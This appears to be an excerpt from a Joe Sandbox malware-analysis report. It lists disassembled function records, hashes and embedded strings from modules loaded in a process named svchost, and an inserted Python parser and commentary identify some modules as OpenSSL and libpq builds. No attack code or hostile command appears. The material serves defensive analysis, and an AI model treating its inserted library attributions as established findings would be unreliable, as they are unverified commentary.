                                                                                            • Opcode ID: e4832274bbdca2be7ebb53921d75cb31a838a226735c15531aee403aa6de7e64
                                                                                            • Instruction ID: 5349dcf85be0d1189159baad79fa63f26f6226064acf8fcee8c3bf2932554eba
                                                                                            • Opcode Fuzzy Hash: e4832274bbdca2be7ebb53921d75cb31a838a226735c15531aee403aa6de7e64
                                                                                            • Instruction Fuzzy Hash: 63F01265B0B60246FA54AB7998611B81312EF48B55F1C2135ED0E573D7DE1ED8518248
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_free$Y_free
                                                                                            • String ID: ssl\ssl_lib.c
                                                                                            • API String ID: 3642664693-1984206432
                                                                                            • Opcode ID: 6d0946d844a4db522dc917eab90d6050f22cb33342ced9b0e25f45acba3a926a
                                                                                            • Instruction ID: f126ba0423806aec2751c5c557baaf977ab61b7ee4be4e9351099109cfb32ca0
                                                                                            • Opcode Fuzzy Hash: 6d0946d844a4db522dc917eab90d6050f22cb33342ced9b0e25f45acba3a926a
                                                                                            • Instruction Fuzzy Hash: 17E09AA1F0720296FE00F761C8A26B86B129F48B84F4C7031D90C67793DE1EE996C309
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_free
                                                                                            • String ID: ssl\quic\quic_srtm.c
                                                                                            • API String ID: 2581946324-1571964953
                                                                                            • Opcode ID: 5b17fc0959d40293f1fb9f52036a93e303e7a693c0bb234606a7881b31c3b62f
                                                                                            • Instruction ID: 737798cd1182c3d601a4289a178b39b876c4eeaa8ec2fd59e41f4658fc8160ea
                                                                                            • Opcode Fuzzy Hash: 5b17fc0959d40293f1fb9f52036a93e303e7a693c0bb234606a7881b31c3b62f
                                                                                            • Instruction Fuzzy Hash: 5CF0A920B1B68282FE50CA46D8A07B89222AF48BC4F1C2030ED4E17B87DE5EE5428704
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_free
                                                                                            • String ID: ssl\statem\extensions.c
                                                                                            • API String ID: 2581946324-3728926295
                                                                                            • Opcode ID: 1accfdfe4a94efb59a3313601236a7f2cdd8d76c14d7920cd6b5e9182a44a3e6
                                                                                            • Instruction ID: 93227b0b7822c4139911531a2401783e7cec50859248aef66509aa22fa0a6917
                                                                                            • Opcode Fuzzy Hash: 1accfdfe4a94efb59a3313601236a7f2cdd8d76c14d7920cd6b5e9182a44a3e6
                                                                                            • Instruction Fuzzy Hash: 4DF092B2F03641C7F790DB29D4583A42291EB48B54F5C1234DA5C8B3D3EF6A85E28715
APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
• Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
Similarity
• API ID: O_free
• String ID: crypto\packet.c
• API String ID: 2581946324-224687097
• Opcode ID: 850b09b68a2f926bf784a38b14cb93f051b66521e308ea84b3355f2be20b7ec1
• Instruction ID: 7399c8e9770df6d160a0bdc992104358e68045d3b106f5932400915b1850bd2e
• Opcode Fuzzy Hash: 850b09b68a2f926bf784a38b14cb93f051b66521e308ea84b3355f2be20b7ec1
• Instruction Fuzzy Hash: 49E0D865B1A64282FE54DB55E4A57785261FF5DBD4F1C2030EE4D47B83DF2DD4508304
APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
• Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
Similarity
• API ID: O_free
• String ID: ssl\quic\quic_user.c
• API String ID: 2581946324-2291346005
• Opcode ID: 7f3c0570978d6f441575d252adf1a72b58b56be861ec3d7da58e6de7f37517db
• Instruction ID: 24915e3e8ca1755a930ea1bd67e38efcc961960906ae970d6f1af26e2d50d703
• Opcode Fuzzy Hash: 7f3c0570978d6f441575d252adf1a72b58b56be861ec3d7da58e6de7f37517db
• Instruction Fuzzy Hash: 6AC08055F1704357FD44B314D5652B46552EF44304F8CE470D10C13783DD0EA9594714
APIs
Memory Dump Source
• Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
• Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
Similarity
• API ID: D_unlockD_write_lock
• String ID:
• API String ID: 1724170673-0
• Opcode ID: 979abf4c36315698262437b1d788520d1c39c78566ec60faab6647c1b7c5aa6c
• Instruction ID: 9d56986b9866bca13346d5a9336644d24f380770fc42b23aa3d89362caef7d99
• Opcode Fuzzy Hash: 979abf4c36315698262437b1d788520d1c39c78566ec60faab6647c1b7c5aa6c
• Instruction Fuzzy Hash: EF11E721F0668182FA89CB66E5913BC5255FF88B94F4C2231EF2D5B3D6DE29E4A14304
APIs
• _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D9813
• free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D986E
  • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFDA36D1C16,?,?,?,?,00007FFDA36D1CA5), ref: 00007FFDA36E2CE8
  • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2D10
  • Part of subcall function 00007FFDA36E2CD0: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2D31
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: _errno$_strdupfreelibintl_dgettext
• String ID: attribute has no values on LDAP lookup$base$could not create LDAP structure$invalid LDAP URL "%s": invalid port number$invalid LDAP URL "%s": missing distinguished name$invalid LDAP URL "%s": must have exactly one attribute$invalid LDAP URL "%s": must have search scope (base/one/sub)$invalid LDAP URL "%s": no filter$invalid LDAP URL "%s": scheme must be ldap://$invalid connection option "%s"$ldap://$localhost$lookup on LDAP server failed: %s$more than one entry found on LDAP lookup$no entry found on LDAP lookup$one$out of memory$sub$unterminated quoted string in connection info string
• API String ID: 3307937308-2289937810
• Opcode ID: d945ba071056f28b8dc67d6366e3f13f9fe005f8d8993e87f1bef95e5274050b
• Instruction ID: dbef48ef09f2a8adfc273d354dc7b578fbc3c96679f265f0aa0540ac75f6daae
• Opcode Fuzzy Hash: d945ba071056f28b8dc67d6366e3f13f9fe005f8d8993e87f1bef95e5274050b
• Instruction Fuzzy Hash: CC126126B0FB8281FA149B15E4603B967A2EF85BC4F4C6031C94E27796EF7EE545C708
APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
• Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
Similarity
• API ID: R_set_debug$E_newE_saveR_newR_set_error
• String ID: INITIAL_SCID was not sent but is required$ORIG_DCID was not sent but is required$QUIC error code: 0x%llx%s%s%s, reason: "%s"$RETRY_SCID was not sent but is required$ack_delay_exponent$active_connection_id_limit$bad transport parameter$ch_on_transport_params$connection_id$disable_active_migration$initial_max_data$initial_max_stream_data_bidi_local$initial_max_stream_data_bidi_remote$initial_max_stream_data_uni$initial_max_streams_bidi$initial_max_streams_uni$internal error$internal error (packet buf init)$ip_v4$ip_v6$max_ack_delay$max_idle_timeout$max_udp_payload_size$multiple transport parameter extensions$original_destination_connection_id$original_source_connection_id$ossl_quic_channel_raise_protocol_error_loc$owner$parameters_set$port_v4$port_v6$preferred_addr$remote$retry_source_connection_id$ssl\quic\quic_channel.c$stateless_reset_token$transport$transport:parameters_set
• API String ID: 2363558997-1518001504
• Opcode ID: 05971cc122452bfdb95474274993fb97959bc8ad436ddf8ec811c83580974c45
• Instruction ID: 34985b23516f4a320b42e3e93277ec3d08021c7d8aad032aff2ee776be144709
• Opcode Fuzzy Hash: 05971cc122452bfdb95474274993fb97959bc8ad436ddf8ec811c83580974c45
• Instruction Fuzzy Hash: D9228D62F0AB9285FA04DB50A8202F967B2EB45748F482436DE4D27797DF3EE544C748
APIs
Memory Dump Source
• Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
• Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
Similarity
• API ID: abort
• String ID:
• API String ID: 4206212132-0
• Opcode ID: 13ff4a3754904bbb3bc8dbc8bdd4b0076ab3b4567bd63c3a52ad1bceb12f0298
• Instruction ID: 144799cc570f6e4d55c58561d97e9216be06939be2c9a6909c1f5fe64adfa8d5
• Opcode Fuzzy Hash: 13ff4a3754904bbb3bc8dbc8bdd4b0076ab3b4567bd63c3a52ad1bceb12f0298
• Instruction Fuzzy Hash: CA41F252AAE15AAFA111BBF85CA836EAF408B6335DBC57F32D95C07340DBDDCC819211
Memory Dump Source
• Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
• Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 09338269764657c19c985b91da17a14dff50020c0064e21fac87f267f10655d2
• Instruction ID: fa0d6515a5041b6f437e78e619b860929a54b0d8984f62474ae614817fe1094e
• Opcode Fuzzy Hash: 09338269764657c19c985b91da17a14dff50020c0064e21fac87f267f10655d2
• Instruction Fuzzy Hash: F5518E659AE119AFA610EBE448A876EAF51DB6334EBC07F33D50C43305DBEDCC858205
APIs
Memory Dump Source
• Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
• Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
Similarity
• API ID: abort
• String ID:
• API String ID: 4206212132-0
• Opcode ID: 0795e0ff7e3c7c0d41e883caee80865a1448dfe7e56efcdf7d589bc7be18fe08
• Instruction ID: 51b1fb3618322b24287c5ee3c0dd4d3e5d4fc51681ee0a5299448747c72eac5f
• Opcode Fuzzy Hash: 0795e0ff7e3c7c0d41e883caee80865a1448dfe7e56efcdf7d589bc7be18fe08
• Instruction Fuzzy Hash: 9631DC11AAE06A9BA211E7F858A836EAF00CF6735CBC03F32D95C07380DBDDCC458241
Memory Dump Source
• Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
• Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ce1edefbcfe34fea2495cb283717aa6de781e3f5592bdae044f66344c2262727
• Instruction ID: 5357dbd7bce86d55a15de6e9f1701ad1535d6657fd58090d9f67bfd37e9c051f
• Opcode Fuzzy Hash: ce1edefbcfe34fea2495cb283717aa6de781e3f5592bdae044f66344c2262727
• Instruction Fuzzy Hash: 8E512D619AE15A9BE210E7E488A876EAF54EB17348BC07F33D50C43344CBEDDC818785
Memory Dump Source
• Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
• Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ffbe3ab80a2a4ad7ccdc522cdf97218cc7837a75b5a4f5e1deaa7753c65576ea
• Instruction ID: 8d3c3548f0e74ea16501d1cff62c475dc3b3b55bc18b8867432cd0e63ca89b13
• Opcode Fuzzy Hash: ffbe3ab80a2a4ad7ccdc522cdf97218cc7837a75b5a4f5e1deaa7753c65576ea
• Instruction Fuzzy Hash: 8731DE612AA15A8BA200EBF99CA83BEAF51DF1775DBC07F33D51C43394CBA9CC419204
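The function records above are far easier to triage once they are parsed rather than read one by one. The Python below is an added example for this report, not Joe Sandbox tooling or anything produced by the sample: it reads the listing in the layout used on this page (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity, with every record closed by an Instruction Fuzzy Hash line, which is an assumption taken from the page layout), then counts records per dumped module base, lists the imported (function, DLL) pairs, and pulls out compiler-embedded source paths from the String ID field. The embedded SAMPLE is a constructed, abridged copy of two records from this page.

```python
"""Parse the Joe Sandbox "IDA Plugin" function records reproduced on this page.

Added example, not Joe Sandbox tooling.  The record layout (APIs / Strings /
Memory Dump Source / Joe Sandbox IDA Plugin / Similarity, every record closed
by an "Instruction Fuzzy Hash" line) is taken from the page; SAMPLE is a
constructed, abridged copy of two records from this page.
"""
import re
from collections import Counter

SECTIONS = {"APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Similarity"}
FIELD = re.compile(r"^•\s*([^:]+?):\s*(.*)$")
# "• name.DLL(args), ref: ADDR", optionally prefixed "Part of subcall function ADDR:"
API_CALL = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(\w+)\.([\w-]+)(?:\([^)]*\))?,?\s*ref:\s*([0-9A-Fa-f]+)$")
OFFSET = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")
SOURCE_PATH = re.compile(r"^[\w\\/.-]+\.[ch]$")   # e.g. ssl\quic\quic_user.c

SAMPLE = """\
APIs
Memory Dump Source
• Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
Similarity
• API ID: O_free
• String ID: ssl\\quic\\quic_user.c
• Instruction Fuzzy Hash: 6AC08055F1704357FD44B314D5652B46552EF44304F8CE470D10C13783DD0EA9594714
APIs
• _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D9813
• free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D986E
  • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2D10
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: _errno$_strdupfreelibintl_dgettext
• String ID: attribute has no values on LDAP lookup$base$could not create LDAP structure
• Instruction Fuzzy Hash: CC126126B0FB8281FA149B15E4603B967A2EF85BC4F4C6031C94E27796EF7EE545C708
"""

def _new(): return {"apis": [], "dump": None, "module_base": None, "snapshot": None}

def parse_records(text):
    """Return one dict per function record, in listing order."""
    records, cur, section = [], _new(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs":                      # call list, not key: value
            m = API_CALL.match(line)
            if m:
                cur["apis"].append({"name": m.group(1), "dll": m.group(2),
                                    "ref": m.group(3).upper()})
            continue
        m = FIELD.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2)
        if key == "Source File":
            off = OFFSET.search(value)
            cur["dump"] = value.split(",", 1)[0]
            cur["module_base"] = off.group(1).upper() if off else None
        elif key == "Snapshot File":
            cur["snapshot"] = value
        elif key in ("API ID", "String ID", "Opcode ID", "Instruction Fuzzy Hash"):
            cur[key] = value
        if key == "Instruction Fuzzy Hash":        # last field of every record
            records.append(cur)
            cur, section = _new(), None
    return records

def by_module(records):
    """Records per dumped module base; each dump here is one PE image."""
    return Counter(r["module_base"] for r in records)

def source_paths(records):
    """'$'-separated String ID entries that look like compiler-embedded source
    paths; these identify the third-party library a dumped module was built from."""
    found = {s.strip() for r in records for s in r.get("String ID", "").split("$")
             if SOURCE_PATH.match(s.strip())}
    return sorted(found)

def imported_apis(records):
    """Distinct (function, DLL) pairs seen under APIs across all records."""
    return sorted({(a["name"], a["dll"]) for r in records for a in r["apis"]})

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records", dict(by_module(recs)))
    print("source paths:", source_paths(recs))
    print("APIs:", imported_apis(recs))
```

Run against the full listing, `source_paths()` surfaces entries such as `ssl\quic\quic_channel.c`, `ssl\statem\extensions.c` and `crypto\packet.c` for the module based at 0x7FFDA3600000; those are OpenSSL source-tree paths, so that module is an OpenSSL build with QUIC support rather than malware-specific code. The `invalid LDAP URL "%s"` and `unterminated quoted string in connection info string` messages in the 0x7FFDA36D0000 module are the ones libpq, the PostgreSQL client library, emits while parsing a connection string, which is the kind of library identification this report's records support without further reversing.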
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 8bc10ce64063221e8887b85e34a5ce62e8ab18b25c7980e5225a7fc90194eb4c
                                                                                            • Instruction ID: d8d428209b474f962ab5baa2e3c27ca8521fc32d95ffd1db33ddbd7b7e271840
                                                                                            • Opcode Fuzzy Hash: 8bc10ce64063221e8887b85e34a5ce62e8ab18b25c7980e5225a7fc90194eb4c
                                                                                            • Instruction Fuzzy Hash: D7211D62AAE05A9BA650A7F85CA9B6EDF408F6334C7C43F33C51C87B808B8CCD455256
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_errno_strdup$libintl_dgettextmallocstrcmp
                                                                                            • String ID: :$?$@$@$@$IPv6 host address may not be empty in URI: "%s"$]$dbname$end of string reached when looking for matching "]" in IPv6 host address in URI: "%s"$extra key/value separator "=" in URI query parameter: "%s"$host$invalid URI propagated to internal parser routine: "%s"$invalid URI query parameter: "%s"$invalid connection option "%s"$missing key/value separator "=" in URI query parameter: "%s"$out of memory$password$port$prefer$require$requiressl$ssl$sslmode$true$unexpected character "%c" at position %d in URI (expected ":" or "/"): "%s"$user
                                                                                            • API String ID: 325725218-894359435
                                                                                            • Opcode ID: 3786fe3d99ac28ea43d40841bfe94f4e85d2eeab9430298346db012d0fc38ff7
                                                                                            • Instruction ID: e992ee71fd2cb61e5ce7b5f12c6f1db4830f54ebbb2a41221cd42d85a2eb1535
                                                                                            • Opcode Fuzzy Hash: 3786fe3d99ac28ea43d40841bfe94f4e85d2eeab9430298346db012d0fc38ff7
                                                                                            • Instruction Fuzzy Hash: 3B028353B0FA8244FB658725A4383792B93AF52BC4F4C6031DA4D263DBDE6EE445C309
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 6cfd3f1bd986bb4813897892ad6781e1333348a5243eecd47d0186c0da29410f
